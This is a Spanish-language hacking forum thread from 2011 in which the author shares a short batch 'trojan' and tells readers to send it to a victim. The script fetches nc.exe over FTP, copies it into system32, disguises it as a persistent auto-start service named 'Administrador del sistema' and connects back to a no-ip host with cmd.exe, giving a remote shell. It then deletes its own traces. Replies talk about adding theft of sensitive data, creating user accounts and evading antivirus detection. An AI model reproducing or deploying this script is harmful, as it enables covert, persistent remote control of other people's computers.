FORUM


Reload | Recent posts | New post


Troyano para windows No detectable! [Batch]


xAutor: xx l0ve
Answers: 11
Date: 2011-09-07
Agradecer Agradecimientos: 3

Jaja les traigo este simple troyano de conexión inversa hecho en pocas lineas, no testeado para Windows que intenta conectarse a una dirección. Bueno es simple, se descarga el nc.exe por ftp, lo mueve a system32 y lo agrega como servicio del sistema, si este se cierra automáticamente se inicia e intenta conectarse, no se si funciona pero tal vez con las modificaciones correcta queda . Yo no uso Windows por ende tengo poca idea. Solo se que la ruta con espacios afecta al agregar el servicio. Hay que hacerle los cambios de la configuración en el code.

Le envian el batch a la victima y ya conocen lo demàs .

@echo off
echo user usuario> ftpcmd.dat
echo password>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo get nc.exe>> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat ftp.servidor.com
move nc.exe %SystemRoot%\system32\nc.exe
sc create "Administrador del sistema" binpath= "%SystemRoot%\system32\nc.exe ip.no-ip.org puerto -e cmd.exe" error= "Critical" start= "auto"
del ftpcmd.dat
del mi.bat



Saludos!

Han agradecido este post: incid3nt Jackrar tuvieja .

Answers:



[x][x][x] incid3nt (11 y): Yo hace tiempo hcie uno similar con xDariohcx pero con más funciones,como extraccion de datos "sensibles",creación de una cuenta de usuario ...etc

Saludos ;)


[x][x][x] l0ve (11 y): Esta muy bien este es muy bàsico, una shell para controlar el sistema y un servicio anti cierre .. 13 lineas de còdigo. lo ideal!!


[x][x][x] Knet (11 y): se ve lindo, funcara en win7?


[x][x][x] l0ve (11 y): no creo, todo depende de la config de seguridad.


[x][x][x] incid3nt (11 y): Aunque tiene que estar en el sistema el nc.exe,podrias usar el complementarlo con el código que creaba el netcat en batch xD



[x][x][x] l0ve (11 y): mejor con el codigo que lo creaba, pero ni lees el codigo, este descarga el netcat por ftp y mejor si consiguen un ftp anonimo.


[x][x][x] incid3nt (11 y): Ah,l0ve disculpame,lo pase por alto.

Si lo habia leido pero no con atencion xD


[x][x][x] chad (11 y): Voy a usarlp en vb.net porce esp es detectable porque usa netcat , el netcat es detectable


[x][x][x] zer0max (11 y): bien


[x][x][x] soybenox (29 d): nice


[x][x][x] MuldeR (28 d): Benox entra al discord https://discord.gg/hdF3epNfsn


Para dejar un comentario Registrase o Iniciar sesión